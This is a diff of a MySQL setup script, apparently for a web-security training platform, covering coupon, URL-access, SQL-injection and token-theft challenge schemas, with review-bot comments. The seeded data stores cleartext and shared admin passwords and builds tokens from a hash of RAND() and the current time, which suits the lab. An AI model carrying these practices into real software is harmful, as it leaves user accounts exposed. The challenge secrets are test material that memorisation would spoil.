COMMIT;
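Review bot: `CryptShop` is still created with `DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci`, while the other schemas visible in this diff use `utf8mb4` / `utf8mb4_unicode_ci`. In MySQL `utf8` is the three-byte utf8mb3 alias, so `itemName` and `couponCode` cannot hold four-byte characters. Since the line is rewritten here anyway, it could become `DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci`, unless the challenge depends on the older charset. This section also sets `SQL_MODE='TRADITIONAL,ALLOW_INVALID_DATES'` although neither table shown has a date column, so plain `'TRADITIONAL'` would match the other sections.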
@@ -1495,22 +830,14 @@ COMMIT;
-- Data for table `CryptShop`.`coupons`
-- -----------------------------------------------------
START TRANSACTION;
-USE
-`CryptShop`;
-INSERT INTO `CryptShop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`)
-VALUES (1, 100, 'PleaseTakeAFruit', 3);
-INSERT INTO `CryptShop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`)
-VALUES (2, 100, 'FruitForFree', 3);
-INSERT INTO `CryptShop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`)
-VALUES (3, 10, 'PleaseTakeAnOrange', 2);
-INSERT INTO `CryptShop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`)
-VALUES (4, 50, 'HalfOffOranges', 2);
-INSERT INTO `CryptShop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`)
-VALUES (5, 10, 'PleaseTakeABanana', 4);
-INSERT INTO `CryptShop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`)
-VALUES (6, 50, 'HalfOffBananas', 4);
-INSERT INTO `CryptShop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`)
-VALUES (432197, 100, 'e!c!3etZoumo@Stu4rU176', 2);
+USE `CryptShop`;
+INSERT INTO `CryptShop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`) VALUES (1, 100, 'PleaseTakeAFruit', 3);
+INSERT INTO `CryptShop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`) VALUES (2, 100, 'FruitForFree', 3);
+INSERT INTO `CryptShop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`) VALUES (3, 10, 'PleaseTakeAnOrange', 2);
+INSERT INTO `CryptShop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`) VALUES (4, 50, 'HalfOffOranges', 2);
+INSERT INTO `CryptShop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`) VALUES (5, 10, 'PleaseTakeABanana', 4);
+INSERT INTO `CryptShop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`) VALUES (6, 50, 'HalfOffBananas', 4);
+INSERT INTO `CryptShop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`) VALUES (432197, 100, 'e!c!3etZoumo@Stu4rU176', 2);
COMMIT;
-- -----------------------------------------------------
@@ -1518,99 +845,53 @@ COMMIT;
-- Failure to Restrict URL Access Challenge Three Schema
-- -----------------------------------------------------
-- -----------------------------------------------------
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
-DROP SCHEMA IF EXISTS `UrlAccessThree`;
-CREATE SCHEMA IF NOT EXISTS `UrlAccessThree` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;
-USE
-`UrlAccessThree` ;
+DROP SCHEMA IF EXISTS `UrlAccessThree` ;
+CREATE SCHEMA IF NOT EXISTS `UrlAccessThree` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci ;
+USE `UrlAccessThree` ;
-- -----------------------------------------------------
-- Table `UrlAccessThree`.`users`
-- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `UrlAccessThree`.`users`
-(
- `userId`
- INT
- NOT
- NULL,
- `userName`
- VARCHAR
-(
- 32
-) NOT NULL ,
- `userPassword` VARCHAR
-(
- 128
-) NOT NULL ,
- `userAddress` VARCHAR
-(
- 128
-) NOT NULL ,
- `userRole` VARCHAR
-(
- 32
-) NOT NULL,
- PRIMARY KEY
-(
- `userId`
-) )
- ENGINE = InnoDB;
-
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+CREATE TABLE IF NOT EXISTS `UrlAccessThree`.`users` (
+ `userId` INT NOT NULL ,
+ `userName` VARCHAR(32) NOT NULL ,
+ `userPassword` VARCHAR(128) NOT NULL ,
+ `userAddress` VARCHAR(128) NOT NULL ,
+ `userRole` VARCHAR(32) NOT NULL,
+ PRIMARY KEY (`userId`) )
+ENGINE = InnoDB;
+
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
-- -----------------------------------------------------
-- Data for table `UrlAccessThree`.`users`
-- -----------------------------------------------------
START TRANSACTION;
-USE
-`UrlAccessThree`;
-INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (1223, 'aGuest', '!14897-hs.alNj.kFim81', 'zoidberg23@shepherd.com', 'guest');
-INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (1224, 'manager', '!14897-hs.alNj.kFim81', 'zoidberg23@shepherd.com', 'admin');
-INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (1225, 'sean', '!14897-hs.alNj.kFim81', 'zoidberg24@shepherd.com', 'admin');
-INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (3214, 'administrator', '!14897-hs.alNj.kFim81', 'buzzthebald@shepherd.com', 'admin');
-INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (3212, 'root', '!14897-hs.alNj.kFim81', 'elitehacker@shepherd.com', 'admin');
-INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (6344, 'superuser', '!14897-hs.alNj.kFim81', 'superman@security.com', 'admin');
-INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (6345, 'MrJohnReillyTheSecond', '!14897-hs.alNj.kFim81', 'MrJohnReillyTheSecond@security.com', 'superadmin');
-INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (6346, 'megauser', '!14897-hs.alNj.kFim81', 'megaman@security.com', 'admin');
-INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (6347, 'hyperuser', '!14897-hs.alNj.kFim81', 'hmegaman@security.com', 'admin');
-INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (6348, 'godzilla', '!14897-hs.alNj.kFim81', 'godzilla@security.com', 'admin');
-INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (6349, 'kinguser', '!14897-hs.alNj.kFim81', 'kinguser@security.com', 'admin');
-INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (4524, 'privileged', '1489!72hsfalkjlkfi381', 'spoiltbrat@security.com', 'admin');
-INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (6343, 'mark', '148!97-hs.alNj.kFim81', 'superman2@security.com', 'admin');
-INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (6342, 'markdenihan', '148!97-hs.alNj.kFim81', 'superman3@security.com', 'admin');
-INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (6341, 'seanduggan', '148972!hsfalkjlkfi381', 'superman4@security.com', 'admin');
-INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (6551, 'rootuser', '14897!2hsfalkjlkfi381', 'superman6@security.com', 'admin');
-INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (6552, 'adminuser', '1489!72hsfalkjlkfi381', 'superman7@security.com', 'admin');
-INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (6559, 'shepherd', '148972hsfalk!jlkfi381', 'superman8@security.com', 'admin');
+USE `UrlAccessThree`;
+INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (1223, 'aGuest', '!14897-hs.alNj.kFim81', 'zoidberg23@shepherd.com', 'guest');
+INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (1224, 'manager', '!14897-hs.alNj.kFim81', 'zoidberg23@shepherd.com', 'admin');
+INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (1225, 'sean', '!14897-hs.alNj.kFim81', 'zoidberg24@shepherd.com', 'admin');
+INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (3214, 'administrator', '!14897-hs.alNj.kFim81', 'buzzthebald@shepherd.com', 'admin');
+INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (3212, 'root', '!14897-hs.alNj.kFim81', 'elitehacker@shepherd.com', 'admin');
+INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (6344, 'superuser', '!14897-hs.alNj.kFim81', 'superman@security.com', 'admin');
+INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (6345, 'MrJohnReillyTheSecond', '!14897-hs.alNj.kFim81', 'MrJohnReillyTheSecond@security.com', 'superadmin');
+INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (6346, 'megauser', '!14897-hs.alNj.kFim81', 'megaman@security.com', 'admin');
+INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (6347, 'hyperuser', '!14897-hs.alNj.kFim81', 'hmegaman@security.com', 'admin');
+INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (6348, 'godzilla', '!14897-hs.alNj.kFim81', 'godzilla@security.com', 'admin');
+INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (6349, 'kinguser', '!14897-hs.alNj.kFim81', 'kinguser@security.com', 'admin');
+INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (4524, 'privileged', '1489!72hsfalkjlkfi381', 'spoiltbrat@security.com', 'admin');
+INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (6343, 'mark', '148!97-hs.alNj.kFim81', 'superman2@security.com', 'admin');
+INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (6342, 'markdenihan', '148!97-hs.alNj.kFim81', 'superman3@security.com', 'admin');
+INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (6341, 'seanduggan', '148972!hsfalkjlkfi381', 'superman4@security.com', 'admin');
+INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (6551, 'rootuser', '14897!2hsfalkjlkfi381', 'superman6@security.com', 'admin');
+INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (6552, 'adminuser', '1489!72hsfalkjlkfi381', 'superman7@security.com', 'admin');
+INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (6559, 'shepherd', '148972hsfalk!jlkfi381', 'superman8@security.com', 'admin');
COMMIT;
@@ -1620,112 +901,61 @@ COMMIT;
-- -----------------------------------------------------
-- -----------------------------------------------------
-DROP SCHEMA IF EXISTS `sqlInjectSeven`;
-CREATE SCHEMA IF NOT EXISTS `sqlInjectSeven` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;
-USE
-`sqlInjectSeven`;
+DROP SCHEMA IF EXISTS `sqlInjectSeven` ;
+CREATE SCHEMA IF NOT EXISTS `sqlInjectSeven` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci ;
+USE `sqlInjectSeven`;
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
-- -----------------------------------------------------
-- Table `sqlInjectSeven`.`users`
-- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `sqlInjectSeven`.`users`
-(
- `userId`
- INT
- NOT
- NULL,
- `userName`
- VARCHAR
-(
- 32
-) NOT NULL ,
- `userPassword` VARCHAR
-(
- 128
-) NOT NULL ,
- `userEmail` VARCHAR
-(
- 128
-) NOT NULL ,
- `userRole` VARCHAR
-(
- 8
-) NOT NULL DEFAULT 'default' ,
- PRIMARY KEY
-(
- `userId`
-) )
- ENGINE = InnoDB;
-
-
-
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+CREATE TABLE IF NOT EXISTS `sqlInjectSeven`.`users` (
+ `userId` INT NOT NULL ,
+ `userName` VARCHAR(32) NOT NULL ,
+ `userPassword` VARCHAR(128) NOT NULL ,
+ `userEmail` VARCHAR(128) NOT NULL ,
+ `userRole` VARCHAR(8) NOT NULL DEFAULT 'default' ,
+ PRIMARY KEY (`userId`) )
+ENGINE = InnoDB;
+
+
+
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
-- -----------------------------------------------------
-- Data for table `sqlInjectSeven`.`users`
-- -----------------------------------------------------
START TRANSACTION;
-USE
-`sqlInjectSeven`;
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (40, 'User 1', 'de1027fnNys6687as!283619fj1237fault', 'UserJohn1@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (41, 'User 2', 'd128361027fnNys6687as!9fj1237efault', 'UserJim2@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (42, 'User 3', 'defa1283619f027fnNys6687as!j1237ult', 'UserJone3@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (43, 'User 4', 'd1283619fj12027fnNys6687as!37efault', 'UserBell4@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (44, 'User 5', 'defau1283619fj1237lt', 'UserConan5@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (45, 'User 6', 'de1283619fj1237fault', 'UserSmioth6@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (46, 'User 7', 'def1d88027fnNys6687as!sd&dsault', 'UserHat7@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (47, 'User 8', 'def1d027fnNys6687as!88sd&dsault', 'UserPage8@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (48, 'User 9', 'defaul027fnNys6687as!1d88sd&dst', 'UserCube9@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (49, 'User 11', 'd1d88027fnNys6687as!sd&dsefault', 'MrsJohn1@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (50, 'User 12', 'defau027fnNys6687as!l1d88sd&dst', 'MrsJim2@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (51, 'User 13', 'def_926diUUscnaosOault', 'MrsJone3@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (52, 'User 14', 'd_926diUUscnaosOefault', 'MrsBell4@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (53, 'User 15', 'defaul_926diUUscnaosOt', 'MrsConan5@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (54, 'User 16', 'de_926diUUscnaosOfault', 'MrsSmioth6@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (55, 'User 17', 'defaul_926diUUscnaosOt', 'MrsHat7@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (56, 'User 18', 'de_926diUUscnaosOfault', 'MrsPage8@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (57, 'User 19', 'defa_926diUUscnaosOult', 'MrsCube9@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (58, 'User 20', 'd_926diUUscnaosOefault', 'Mr20@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (59, 'User 21', 'defa1027fnNys6687as!ult', 'Mr2John1@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (60, 'User 22', 'de027fnNys6687as!fault', 'Mr2Jim2@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (61, 'User 23', 'defau027fnNys6687as!lt', 'Mr2Jone3@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (62, 'User 10', 'def027fnNys6687as!ault', 'Mrs0@User.com', 'default');
+USE `sqlInjectSeven`;
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (40, 'User 1', 'de1027fnNys6687as!283619fj1237fault', 'UserJohn1@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (41, 'User 2', 'd128361027fnNys6687as!9fj1237efault', 'UserJim2@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (42, 'User 3', 'defa1283619f027fnNys6687as!j1237ult', 'UserJone3@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (43, 'User 4', 'd1283619fj12027fnNys6687as!37efault', 'UserBell4@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (44, 'User 5', 'defau1283619fj1237lt', 'UserConan5@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (45, 'User 6', 'de1283619fj1237fault', 'UserSmioth6@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (46, 'User 7', 'def1d88027fnNys6687as!sd&dsault', 'UserHat7@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (47, 'User 8', 'def1d027fnNys6687as!88sd&dsault', 'UserPage8@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (48, 'User 9', 'defaul027fnNys6687as!1d88sd&dst', 'UserCube9@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (49, 'User 11', 'd1d88027fnNys6687as!sd&dsefault', 'MrsJohn1@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (50, 'User 12', 'defau027fnNys6687as!l1d88sd&dst', 'MrsJim2@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (51, 'User 13', 'def_926diUUscnaosOault', 'MrsJone3@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (52, 'User 14', 'd_926diUUscnaosOefault', 'MrsBell4@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (53, 'User 15', 'defaul_926diUUscnaosOt', 'MrsConan5@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (54, 'User 16', 'de_926diUUscnaosOfault', 'MrsSmioth6@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (55, 'User 17', 'defaul_926diUUscnaosOt', 'MrsHat7@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (56, 'User 18', 'de_926diUUscnaosOfault', 'MrsPage8@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (57, 'User 19', 'defa_926diUUscnaosOult', 'MrsCube9@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (58, 'User 20', 'd_926diUUscnaosOefault', 'Mr20@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (59, 'User 21', 'defa1027fnNys6687as!ult', 'Mr2John1@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (60, 'User 22', 'de027fnNys6687as!fault', 'Mr2Jim2@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (61, 'User 23', 'defau027fnNys6687as!lt', 'Mr2Jone3@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (62, 'User 10', 'def027fnNys6687as!ault', 'Mrs0@User.com', 'default');
COMMIT;
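Review bot: The rows inserted into sqlInjectSeven.users put cleartext literals in `userPassword`, and nothing in the script says whether that is deliberate for the level. If it is, say so above the data block, e.g. `-- Fixture accounts for the sqlInjectSeven level: passwords are stored unhashed on purpose and must not be reused outside the lab`. The same applies to the UrlAccessThree.users rows in the preceding hunk, where several admin accounts also share one password value. Whether any servlet authenticates real players against tables like these cannot be determined from this file; if one does, the column should hold a salted password hash instead.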
@@ -1735,79 +965,44 @@ COMMIT;
-- -----------------------------------------------------
-- -----------------------------------------------------
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL,ALLOW_INVALID_DATES';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL,ALLOW_INVALID_DATES';
-DROP SCHEMA IF EXISTS `securityMisconfigStealToken`;
-CREATE SCHEMA IF NOT EXISTS `securityMisconfigStealToken` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci;
-USE
-`securityMisconfigStealToken` ;
+DROP SCHEMA IF EXISTS `securityMisconfigStealToken` ;
+CREATE SCHEMA IF NOT EXISTS `securityMisconfigStealToken` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci ;
+USE `securityMisconfigStealToken` ;
-- -----------------------------------------------------
-- Table `securityMisconfigStealToken`.`tokens`
-- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `securityMisconfigStealToken`.`tokens`
-(
- `idtokens`
- INT
- NOT
- NULL
- AUTO_INCREMENT,
- `userId`
- VARCHAR
-(
- 64
-) NULL,
- `token` VARCHAR
-(
- 64
-) NULL,
- PRIMARY KEY
-(
- `idtokens`
-),
- UNIQUE INDEX `userId_UNIQUE`
-(
- `userId` ASC
-),
- UNIQUE INDEX `token_UNIQUE`
-(
- `token` ASC
-))
- ENGINE = InnoDB;
-
-
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+CREATE TABLE IF NOT EXISTS `securityMisconfigStealToken`.`tokens` (
+ `idtokens` INT NOT NULL AUTO_INCREMENT,
+ `userId` VARCHAR(64) NULL,
+ `token` VARCHAR(64) NULL,
+ PRIMARY KEY (`idtokens`),
+ UNIQUE INDEX `userId_UNIQUE` (`userId` ASC),
+ UNIQUE INDEX `token_UNIQUE` (`token` ASC))
+ENGINE = InnoDB;
+
+
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
-- getToken Procedure
-USE
-`securityMisconfigStealToken`;
+USE `securityMisconfigStealToken`;
-- DELIMITER $$
-CREATE PROCEDURE `securityMisconfigStealToken`.`getToken`(IN theUserId VARCHAR (64))
+CREATE PROCEDURE `securityMisconfigStealToken`.`getToken` (IN theUserId VARCHAR(64))
BEGIN
-DECLARE
-tokenExists INT;
+DECLARE tokenExists INT;
COMMIT;
-SELECT count(token)
-FROM `securityMisconfigStealToken`.`tokens`
-WHERE userId = theUserId INTO tokenExists;
-IF
-(tokenExists < 1) THEN
+SELECT count(token) FROM `securityMisconfigStealToken`.`tokens` WHERE userId = theUserId INTO tokenExists;
+IF (tokenExists < 1) THEN
INSERT INTO tokens (userId, token) VALUES (theUserId, SHA2(CONCAT(RAND(), now()), 256));
-COMMIT;
+ COMMIT;
END IF;
-SELECT token
-FROM tokens
-WHERE userId = theUserId;
+SELECT token FROM tokens WHERE userId = theUserId;
END
;
-- $$
